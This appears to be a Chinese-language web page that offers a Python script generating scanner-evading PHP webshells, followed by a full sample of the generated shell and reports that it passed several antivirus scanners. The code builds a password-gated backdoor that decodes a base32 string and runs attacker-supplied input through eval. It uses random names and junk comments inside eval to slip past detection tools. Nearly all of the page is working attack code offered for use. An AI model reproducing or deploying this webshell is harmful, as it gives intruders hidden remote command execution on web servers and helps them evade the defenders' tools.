目录导航
生成的webshell可以绕过包括但不限于D盾、webdir+、河马、安全狗等查杀工具
原理
使用注释分隔eval函数内关键字,使用类和构造函数替代引用函数
项目地址
GitHub: https://github.com/pureqh/webshell
下载地址:
①GitHub: github.com/pureqh/webshell/archive/master.zip
②雨苁网盘: w.ddosi.workers.dev
③迅雷网盘: pan.xunlei.com/s/VMGbtMx5ra-c9gH3m2zFOMiNA1
提取码:ZTms
懒得下的可直接复制如下代码.
php_webshell.py代码
import random
#author: pureqh
#github: https://github.com/pureqh/webshell
#use:GET:http://url?pass=pureqh POST:zero
shell = '''<?php
class {0}{1}
public ${2} = null;
public ${3} = null;
function __construct(){1}
if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){1}
$this->{2} = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
$this->{3} = @{9}($this->{2});
@eval({5}.$this->{3}.{5});
{4}{4}{4}
new {0}();
function {6}(${7}){1}
$BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
${8} = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
$v <<= 8;
$v += ord(${7}[$i]);
$vbits += 8;
while ($vbits >= 5) {1}
$vbits -= 5;
${8} .= $BASE32_ALPHABET[$v >> $vbits];
$v &= ((1 << $vbits) - 1);{4}{4}
if ($vbits > 0){1}
$v <<= (5 - $vbits);
${8} .= $BASE32_ALPHABET[$v];{4}
return ${8};{4}
function {9}(${7}){1}
${8} = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
$v <<= 5;
if (${7}[$i] >= 'a' && ${7}[$i] <= 'z'){1}
$v += (ord(${7}[$i]) - 97);
{4} elseif (${7}[$i] >= '2' && ${7}[$i] <= '7') {1}
$v += (24 + ${7}[$i]);
{4} else {1}
exit(1);
{4}
$vbits += 5;
while ($vbits >= 8){1}
$vbits -= 8;
${8} .= chr($v >> $vbits);
$v &= ((1 << $vbits) - 1);{4}{4}
return ${8};{4}
?>'''
def random_keys(len):
str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def random_name(len):
str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
def build_webshell():
className = random_name(4)
lef = '''{'''
parameter1 = random_name(4)
parameter2 = random_name(4)
rig = '''}'''
disrupt = "\"/*"+random_keys(7)+"*/\""
fun1 = random_name(4)
fun1_vul = random_name(4)
fun1_ret = random_name(4)
fun2 = random_name(4)
shellc = shell.format(className,lef,parameter1,parameter2,rig,disrupt,fun1,fun1_vul,fun1_ret,fun2)
return shellc
if __name__ == '__main__':
print (build_webshell())
使用方法
python php_webshell.py
例如:
C:\Users\A\Desktop>python php_webshell.py
<?php
class AWNF{
public $SKBF = null;
public $QPLS = null;
function __construct(){
if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){
$this->SKBF = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
$this->QPLS = @HTKI($this->SKBF);
@eval("/*a_]zfoY*/".$this->QPLS."/*a_]zfoY*/");
}}}
new AWNF();
function NXVK($XQDS){
$BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
$FNTL = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen($XQDS); $i < $j; $i++){
$v <<= 8;
$v += ord($XQDS[$i]);
$vbits += 8;
while ($vbits >= 5) {
$vbits -= 5;
$FNTL .= $BASE32_ALPHABET[$v >> $vbits];
$v &= ((1 << $vbits) - 1);}}
if ($vbits > 0){
$v <<= (5 - $vbits);
$FNTL .= $BASE32_ALPHABET[$v];}
return $FNTL;}
function HTKI($XQDS){
$FNTL = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen($XQDS); $i < $j; $i++){
$v <<= 5;
if ($XQDS[$i] >= 'a' && $XQDS[$i] <= 'z'){
$v += (ord($XQDS[$i]) - 97);
} elseif ($XQDS[$i] >= '2' && $XQDS[$i] <= '7') {
$v += (24 + $XQDS[$i]);
} else {
exit(1);
}
$vbits += 5;
while ($vbits >= 8){
$vbits -= 8;
$FNTL .= chr($v >> $vbits);
$v &= ((1 << $vbits) - 1);}}
return $FNTL;}
?>
青色部分为运行的命令,红色部分为生成的php免杀木马

免杀测试
①D盾已过

②河马已过

③百度WEBDIR+已过
